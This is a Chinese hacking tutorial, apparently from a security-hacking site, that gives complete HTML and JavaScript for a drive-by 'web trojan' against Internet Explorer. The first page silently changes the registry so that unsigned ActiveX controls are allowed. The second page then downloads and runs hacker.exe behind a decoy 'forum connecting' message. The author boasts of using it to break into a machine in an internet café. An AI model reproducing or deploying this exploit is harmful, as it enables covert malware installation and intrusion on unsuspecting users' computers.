· 完美空间提供500M免费AS 04-10 · 企业安全之YY内网准入以 04-09 · 企业安全之意识与策略 04-09 · 剑走偏锋:IIS漏洞利用 04-09 · 我来免费网提供100M免费 04-09 · 1122mb.com提供20G超大免 04-08 · 映像劫持与反劫持技术 04-07 · 让所有"暴力删除工具"无 04-07 · 入侵88red系统的详细过程 04-07 · Sql Injection脚本注入终 04-07 · vbs+delphi 反弹后门生成 04-07 · 飞讯网提供100MB免费PHP 04-07 · 突破SQL注入攻击时输入框 04-04 · 结合内核和病毒技术的最 04-04 · Real Player rmoc3260.d 04-04 · 亿万网络今月最后为您提 04-04 · php+mysql 5 sql inject 04-03 · Real Player rmoc3260.d 04-03 · oblog文件下载漏洞 04-03 · 免费啦提供1G-2G免费全能 04-03 · 完全解析网页后门和挂马 04-02 · 一句话开3389（只测试过 04-02 · 萧萧免费空间网提供100M 04-02 · 谷道免费空间网提供1G免 04-01 · 从本地入手解决双线路由 03-31 · sablog 1.6 多个跨站漏洞 03-31 · 富文本编辑器的跨站脚本 03-31 · Cookie注入是怎样产生的 03-31

具体方法如下：
开启第一个HTML的页面，通过恶意的HTML代码把IE安全级别里的默认的“禁用下栽未签名的ActiveX控件”选项，变为“启用下栽未签名的ActiveX控件”，然后马上打开第二个HTML的文件内容是下载一个未签名的ActiveX控件，实质就是我们所要执行的EXE文件。
将如下代码保存为index.htm文件：

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<CNTER><HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="Microsoft FrontPage 4.0" name=GENERATOR></HEAD>
<BODY>
<SCRIPT>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (documents.cookie.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004",0,"REG_DWORD");
var expdate = new Date((new Date()).getTime() + (1));
documents.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();
</SCRIPT>

<script language="javascript">
<!-- Begin
function opencolortext(){
window.open(’http://xxx.abc.com/2.htm’,’colortext’)
}
setTimeout("opencolortext()",1500)
// End -->
</script>
</BODY></HTML>

下面制作2.htm文件：

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<SCRIPT language=javascript>
run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
run_exe+="CODEBASE=\"hacker.exe#version=1,1,1,1\">"
run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"
run_exe+="</OBJECT>"
run_exe+="<HTML><H1> </H1></HTML>";
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</SCRIPT>

<META content="Microsoft FrontPage 4.0" name=GENERATOR></HEAD>
<BODY>
<p align="center">论坛连接中请勿终断....
<BR>
<CENTER></CENTER><BR>
<BR></BODY></HTML>

其中hacker.exe就是我们要执行的文件。至于那个“论坛连接中请勿终断....”完全是为了迷惑对方，可根据自己喜好而定。接下来只要将index.htm，2.htm和hacker.exe一起上传到主页的同一目录中就ok了！
总结：这个方法的好处是，如果对方在局域网内，我们同样可以用木马进入他的机器并且很难发现。但这个方法也有自己的缺点，那就是用了两种木马，大大的增大了被杀毒软件查杀的几率。不过对方是在网吧中，而我们这里的网吧大多又不安装杀毒软件（用硬盘还原卡代替），并且不升级IE，我这次入侵成功，网吧老板也有一份功劳！